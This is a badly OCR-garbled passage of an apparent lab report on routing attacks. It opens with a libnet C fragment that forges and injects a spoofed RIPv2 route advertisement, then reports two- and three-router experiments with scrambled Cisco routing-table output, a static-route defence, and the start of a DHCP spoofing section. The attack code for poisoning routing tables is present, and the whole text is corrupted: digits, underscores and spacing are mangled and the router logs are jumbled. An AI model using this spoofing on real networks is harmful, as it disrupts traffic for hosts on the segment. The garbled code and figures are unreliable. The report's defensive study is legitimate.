=libnet_init(LIBNET_LINK,
NULL,
errbuf);x=
LIBNET_PTAGJNITIALIZER;
long_srcJp
=((srcjp[0]
24)
&
OxffOOOOOO)
|
((srcjp[l]
16)
&
OxOOffOOOO)
j
((srcjp[2]
8)
&
OxOOOOffOO)
|
(srcjp[3]
&
OxOOOOOOff);
spoof_srcJp
=((spoof_srcip[3]
24)
&
OxffOOOOOO)
|
((spoof_srcip[2]
16)
&
OxOOffOOOO)
j
((spoof_srcip[l]
8)
&
OxOOOOffOO)
|
(spoof_srcip[0]
&
OxOOOOOOff);
long_netmask
=((netmask[0]
24)
&
OxffOOOOOO)
|
((netmask[l]
16)
&
OxOOffOOOO)
j
((netmask[2]
8)
&
OxOOOOffOO)
j
(netmask[3]
&
OxOOOOOOff);
long_next_hop
=((next_hop[0]
24)
&
OxffOOOOOO)
|
((next_hop[l]
16)
&
OxOOffOOOO)
|
((next_hop[2]
8)
&
OxOOOOffOO)
j
(next_hop[3]
&
OxOOOOOOff);
/*
Forming
theRIP
advertisement packet*/
x=
libnet
J>uild_rip(
REPCMDJtESPONSE,
RIPVERJZ,
rd,
//routing
domain
2,
//addr
family
0,
//route
tag
1,
x);
/*
Forming
UDP */
x=
libnet
Juild_udp(
port, port,32,
0,
payload,0,
1,
0);
long_dstJp
=((dstjp[3]
24)
&
OxffOOOOOO)
|
((dstjp[2]
16)
&
OxOOffOOOO)
|
((dstjp[l]
8)
&
OxOOOOffOO)
j
(dstjp[0]
&
OxOOOOOOff);
/*
Forming
IPv4
*/
x=
libnet_buildjpv4(
LIBNETJPV4JI
+LIBNETJJDPJI
+24,
0,
0,
0,
2,
EPPROTOJJDP,
0,
spoof_src_ip,long_dstJp,
NULL,
0,
1,
0);
/*Forming
Ethernet */
x=
libnet
J>uild_ethernet(
enet_multicast,
enet_src, 'ETHERTYPEJP,
NULL,
0,
1,
0);
/*Injecting
theREP
packet outto thenetwork*/
libnet_write(l);
libnet_destroy(l);
return
0;
2 Router Experiment
The
networkis
set sothat
2 hosts
are separatedby
2 Routers. One host
willattempt
to
ping
the
otherhost. An
attackeris
situated onthe
same subnet
asthe
pinger(Figure 3).
Router
1 Router2
J
Host 1 Attacker Host 2
Figure 3: RIP spoofing
attack:2 Routers Experiment
networkset-up
This
attacker will attemptto
disguise
as aRouter
and sendfaulty
RIP
advertisements,
announcing
that the
host
that the
pingeris asking for is
closeto
it
(metric
of1).
The
attacker attempts
to
convincethe
pingerthat
routing
packetsto
it is
closerto the
destination
than
routing
packetsto the
actual routerthat
is
connectedto.
The
networkrouting begins
asthe
routers'
interfaces
start up.The
correctRIP
advertisements spread
to
both
routers.The
hosts
are ableto
ping
each other.Then
the
attacker executes
the
scriptadvertising
afaulty
route onthe
subnetofthe
pinger.The
router
directly
connectedto the
pinger recordsthis
routein its routing
table
(Figure
4)
^rr5HyperTerrhinai
File
Edit
ViewCall
Transfer
Help
IMS
D ^
i
I
sC
Q
180.21.2.0/24 -> o.is.e.a, metric 2, tag
1
sending v2 update to 224.0.9.9 via Ethernetl (100.21.1.1) 100.21.26.0/24 -> a.
B.0.0,
metric 1, tag 0received v2 update from 100.21.1.2 on Ethernetl 100.21.2.0/24 -> 0.0.0.0 in 1 hops
received v2 update from 100.21.26.131 on EthernetB 100.21.2.0 0KE1FFFF00 -> 0.0.0.0 in 1 hops
Router>
Router>sh
Lp
route Codes: C-connected, S - stat
ic,
I -DEIGRP,
EX-EIQRP external NI - OSPF NSSP,
eKternal type 1
RIP:
RIP:
RIP:
IGRP,
R-RIP, M
-nobLie, B -BGP
0
-OSPF, Ifl
-OSPF inter area ., N2
-OSPF NSSP, external type 2
El - OSPF
external type
1,
E2-OSPF external type
2,
E -EGP iIS-IS,
LI - IS-ISlevel-1,
L2-IS-IS level-2, *
-candidate default
U
per-user static route, o
-OOP
liateuay of last resort is not set
100.0.0.0/24 is subnetted, 3 subnets
C 100.21.26.0 is
directly
connected, Ethernets C 100.21.1.0 is d ir ectIy connected. Et hernet1R 100.21.2.O C 120/1] via
100.21.1.2,
00:00:16, Ethernetl C120/1] via1O0.21.26.131,
00:00:16, EthernetORouter>
3
i
Connected
0:47:31
Auto
detect
9600 8-N-lSCROLL
NUM
apture^
Figure 4: RIP spoofing
attack,
correct routeandfaulty
routeBut
uponpinging, the
pinger will choosethe
correct route andthe
ping
willbe
successful.
This
experiment concludesthat
aRIP spoofing
attack with2
routersinvolved is futile.
3 Router Experiment
The
networkis
set sothat
2 hosts
are separatedby
3
Routers
(Figure
5). The
Host
1
Router
1
Router 2
wt\
iap
Attacker
Router 3
Host 3
Figure 5: RIP spoofing
attack,
3 Routers Experiment
networkset-up
The
resultis different from
the
previous experiment greatly.The
routerdirectly
connected
to the
pinger recordsthe
correct route ashaving
a metric of2
whilethe
faulty
route advertisedby
the
attackeris
setto
have
a metric of1. The
correct routewith a worst metric
is deleted
offthe
routing
table
ofthe
router(Figure 6).
Figure 6: RIP spoofing
attack,
3 Routers Experiment
Routing
Table
Before Attacker's
RIP
advertisement:RIP: RIP: RIP: RIP: RIP: RIP: RIP: 10.2 10 " send 10.1 send 10.2 10.: 13.2 send 10.2 r^ce 10.2 18.2 send 19.2 19.2 19.2 send 10.2 rece
2.0/24 -> 0 1.0/24 -> 0
q v2 update
26.0/24
-> 0g v2 update
3.0/24
-> 0.2.0/24 -> 0.
1.0/24 -> 0.
q v2 update
26.0/24 -> 8
ed v2 update
3.0/24 -> 0
2.0/24 -> 0
g v2 update
3.0/24
-> 92.9/24 -> 0
1.0/24 -> 0
0.0.0,
0.0.0,
to 224 .0.0.0 to 2240.0.0,
0.0.0,
0.0.0, to 224 .0.0.0 fron 0.0.9 to 224 0.0.0, 0.0.0,0.0.0,
to 224 0.0.0ived v2 update fron
ig v2 update
.26.0/24 -> 0.
ne net .0.0 ne 0.0 net net net 0.0 , ne 19.2 in 2 in 1 .0.0 net net net .0.0 ne 10.2
ric 1, tag 0
1.9 via Ethernetl (10.21.1.1) trie 1, tag 0
1.9 via Ethernet (18.21.26.1)
ric
3,
tag 8ric
2,
tag 8ric 1, tag 8
1.9 via Ethernetl (18.21.1.1)
trie
1,
tag 01.1.2 on Ethernetl
hops
.9"via Ethernets (18.21.26.1)
ric
3,
tag 8ric
2,
tag 8ric
1,
tag 81.9 via Ethernetl (18.21.1.1)
trie 1, tag 8
1.1.2 on Ethernetl
18.21.3.8/24 -> 0.8.8.0 in 2 hops 10.21.2.8/24 -> 8.8.8.0 in 1 hops
Router!eonfig)8sh ip route
Invalid input detected
ig)Hexit
marker. Router Router ^SVS-5 Lodes (conf *sh -CONF C
0
NI -El i UIG_I: Configured fron console
by
consoleip
routeI
-ISRP, R
-RIP,
R_r
noblie, B.onnected,
S
-static.
EIGRP,
EX - EIGRPexternal, 0
-OSPF, IG
-OSPF inter
OSPF NSSP, external type 1, N2
-OSPF NSSP external type 2
OSPF external type 1, E2
-OSPF external type
2,
E-EGP
IS-IS,
LI - IS-ISlevel-1, L2
-IS-IS level-2, *
-candidat
per-user statio route, o
-ODR
BGP
defau It
Gateway of last B-ort is not ;t
10.0.0.0/24 is subnetted, 4 subnets
C 10.21.26.0 is directly connected, Ethernet
R 10.21.3.0 C120/2] via 10.21.1.2,
80:80:11,
EthernetlR 10.21.2.0 [120/1] via 10.21.1.2, 80:80:11, Ethernetl
C 10.21.1.0 is directly connected, Ethernet!
Router_
After
Attacker's
RIP
advertisement:
RIP: RIP: RIP: RIP: RIP: RIP: recei 18.21 18.21 18.21 recei 18.21 10.21 10.21 sendi 10.21 18.21 sendi 10.21 18.21 18.21 18.21 sendi 18.21 sendi 18.21ved v2 update fron 1
.3.0/24 -> 0.8.8.0 i
.3.0/24 -> 0.8.8.0 i
.2.0/24 -> 8.0.0.0 i ved v2 update fron 1
.3.0/24 -> 0.0.8.8
.3.8/24 -> 8.8.0.0 in 1 hops
0.21. 1.2 on Ethernetl n 2 hops
n 2 hops8.21.2.0/24 -> 0
n 1
hopsending
v2 update 0.21.26.131 on Ethernets0.0.0 in 1 hops
to 224.0.8.9 via Ethe
ng v2 update to 224. 1.0/24 ->
0.8.8.0,
.3.0/24->8.8.8.8,
ng v2 update to 224..2.8/24 ->
0.0.8.8,
.3.8/24 ->
0.0.8.8,
. 1.0/24 ->
8.0.0.0,
.2.0/24 ->
0.0.0.8,
ng v2 update to 224.
.26.8/24 ->
8.0.0.8,
ng v2 up
.3.0/24 ->
0.8.8.8,
0.0.9 via Ethernet (18.2
netric 1, tag 0
net ric
2,
tag cc Systens 18.21.26.1)
1.26. Dhernete (18.21.26. 8.9 via Ethernets
netric
2,
tag 8 netric3,
netric1,
tag 8 netric2,
0.0.9 via Ethernetl (18.21.1.1)1.1.8/24 -> 8.8.8.0
netric
1,
tag 01netr ic tag 0 P7TP1
RIP:
Code
sending v2 update to 224.8.8.9 via Ethernets (10.21.26.1) " 18.21.2.8/24 ->
8.8.8.8,
netric2,
tag 010.21.1.8/24 ->
0.8.8.8,
netric1,
tag 8sending v2 update to 224.8.0.9 via Ethernetl (10.21.1.1) 10.21.26.8/24 ->
8.8.0.8,
netric1,
tag 818.21.3.8/24 ->
8.0.0.8,
netric 2, tag Osh ip route =: L-connected, S
-static, I
-IGRP,
R-RIP, M
-nobiie, B -BGP D
-EIGRP,
EX-EIGRP external, 0
-OSPF, IP
-OSPF inter area NI
-OSPF NSSP external type 1, N2
-OSPF NSSP external type 2 El
-UbPF external type 1, E2
-UbPF external type 2, E
-EGP i
-IS-IS, LI
-IS-IS
level-1,
L2-IS-IS
level-2,
*-candidate default U
-per-user stat to route, o -ODR
Gateway
of last resort is not set.0.0/24 is subnetted, 4 subnets
8.21.26.0 is directly connected. Ethernets
8.21.3.8 [120/1] via 10.21.26.131. 80:00:55, Ethernet 0.21.2.0 [120/1] via
10.21.1.2,
88:80:08,
Ethernetl0.21.1.0 is directly connected, Ethernetl ived v2 update fron 10.21.1.2 on Ethernetl 1.3.0/24 -> O... in 2 hops
1.2.0/24 -> 0.9.0.0 in 1
hops_
1 0 c 1 h: 1 K 1 c 1 Routera RIP: rece 1 :-1 2
Connected 0:09:03
Auto
detect
;9600 3-N-l
F
|
CAPS
|NUM
The
chosen pathduring
aping from
the
pingerto the
host
that
is 3
routersaway from
the
pingeris
through
a non-existent pathformed
by
the
attacker.Thus,
the
ping
willfail. As
the
networktries to
recoverfrom
a singlefaulty
RIP
advertisementpacket,
it
takes
some
time
for
the
routerto
realizethe
faulty
routeis down (Figure 7).
Routerttsh ip route^
Lodes: C
-connected, S
-static, I
-IGRP,
R-RIP, M
-nobiie, B - BGP
0
-EIGRP,
EX-EIGRP external, 0
-OSPF,
IP-OSPF inter area
NI OSPF NSSP external type
1,
N2-OSPF NSSP external type 2 El OSPF external type 1, E2
-OSPF external type 2, E
-EGP i
-IS-IS,
LI-IS-IS
level-1,
L2-IS-IS
level-2,
*-candidate default U
-per-user static route, o
-ODR
Gateway
10 C R R C Rout era-Rout era-Routeraof last resort is not set
0.0.0/24 is subnetted, 4 subnets
10.21.26.0 is
directly
connected, Ethernet 10.21.3.0/24 is possibly down,routing via
10.21.26.131,
Ethernet10.21.2. [120/1] via
10.21.1.2,
00:00:24,
Ethernetl 10.21.1.0 isdirectly
connected, EthernetlConnected
0:1 1:47
Auto
detect
'9600
8-N-l
CP.OLL
NUMi
Capture
Having
a validRIP
routebroadcasting
simultaneously, the
router will stillhave
to
update
the
faulty
routeto
have
adead
route of metric16 (Figure
8)
before it deletes
the
faulty
routecompletely
(Figure
9).
O IJCl UX =-,=,f.. 1...^.,= , ... ^.^,,
Gateway
of last resort Is not setI..Q. 0/24 Is subnetted, 4 subnets
C 1O.21.26.0 is directly connected, Ethernet R 10.21.3.0 [120/1] via
10.21.26.131,
0:03:01,R 10.21.2.0 [120/1] via
16.21.1.2,
00:00:13,
Ett C 10.21.1. isdirectly
connected, EthernetlEthernet
ernet1
Routera
RIP: sending v2 update to 224.0.0.9 via Ethernet (10.21.26.1) 10.21.3.Q/24 ->
O.O..,
netric16,
tag18.21.2.0/24 ->
0.0.0,0,
netric2,
tag 818.21.1.0/24 ->
0.0.0.9,
netric1,
tag 8RIP: sending v2 update to 224.8.8.9 via Ethernetl (10.
10.21.26.8/24 ->
0.S.0.8,
netric1,
tag21.1.1)
I
10.21.3.0/24 ->
0.0.0.0,
netric 16, tag 0RIP: received v2 update fron 10.21.1.2 on Ethernetl 10.21.3.0/24 -> 0.0.0.0 in 2 hops
10.21.2.0/24 -> 0.6.0.0 in 1 hops
Connected 0:18:17
Autodetect
[9600
8-N-l
'OILICARS
iNUM
Figure 8: RIP spoofing
attack,
3 Routers
Experiment,
dead
routeRIP:
10.21
sendi
10.21
Codes: C
-0 NI El U
Gateway
.1.0/24 -> 0.0.0., netric 1, tag
ng v2 update to 224...9 via Ethernetl (10.21.1.1) 26.0/24 -> ..., netric 1, tag Qsh ip route'" connected, S
-static, I
-luRP,
R-RIP,
N-nobiie, B - BGP
EIGRP, EX
-EIGRP external, 0
-OSPF, IP - OSPF inter area
-OSPF NSSP external type
1,
N2 - OSPF NSSPexternal type 2
- OSPF
external type
1,
E2 - OSPFexternal type
2,
E-EGP IS-IS, LI
-IS-IS level-1, L2
-IS-IS level-2, * candidate per-user statio route, o
-ODR
last resort is not set
defau it
18.8.8.8/24 is subnetted,
C 18.21.26.! R 10.21.2. " C 10.21.1. Routera"!." Routera" Routera subnets
is
directly
connected, Ethernet 0[120/1] via 10.21.1.2, 0:00:12, Ethernetl is directly connected, Ethernetl
Connected
0:06:57
Auto
detect
'9600
8-N-l
NUM
Figure 9: RIP spoofing
attack,
3 Routers
Experiment,
missing
entry
Furthermore,
the
router willhave
a period oftime
afterthe
faulty
routeis
completely
gonefrom
the
routing
table
before
the
validentry is
registered.Thus,
In
conclusion,
RIP spoofing
attackeffectively
affects aset-up
with morethan
2
routers.
Any
host in
the
same
network asthe
attacker willfall
a victimto this type
ofattack.
Static Route Experiment
The
use of static route provesto
preventfaulty
routesfrom
damaging
the
routing
table.
The
router will seethe
attacker's
advertisementbut
willignore it
completely.The
update onthe
router shows:"RIP: ignored
v2 updatefrom bad
source100.21.1.2
on
Ethernet 0". Static
entrieshave
precedence overdynamic routing
entries,
including
RIP
entries.3.3 Dynamic Host
Configuration
Protocol
(DHCP)
3.3.1 Background Information
DHCP is
a methodfor hosts
on a networkto
configureits
settingsby letting
the
server
dictates
the
set-up information. The
settingsdictated
by
the
serverinclude
the
IP
address of
the
host
andthe
default
route orthe
host's
gateway.It
accomplishesthe
assignmentof
IP
addresses
by
a processbetween
the
DHCP
server andthe
client.The
processstarts
by having
the
DHCP
server waitfor
the
clientto
send outDHCP
Discover
packets.
Then
the
server will send outDHCP
Offer Packets in reply
to
DHCP
serverit
wants,
in
case of multipleDHCP
servers onthe
networkservicing DHCP
Offers. The
process completesby having
the
server committo
the
IP
addresslease
by
sending
out aDHCP ACK
packet.
The
process can alsocomplete
with aDHCP NACK
packet
from
the
DHCP
server which meansthat the
server will notallocate
the
IP
addressto the
client.The
client will remain without anIP
address and must startthe
DHCP
process again
in
orderto
obtain a validatedlease.
In
anideal
networkenvironment,
the
DHCP
server should not service spoofpackets with addresses
that
does
not exist onthe
network.The DHCP
server should giveout
leases in its IP
address pool and serviceonly
to
legitimate hosts.
In DHCP
servicespoofing,
the
illegitimate
machine willhijack
the
client'sreserva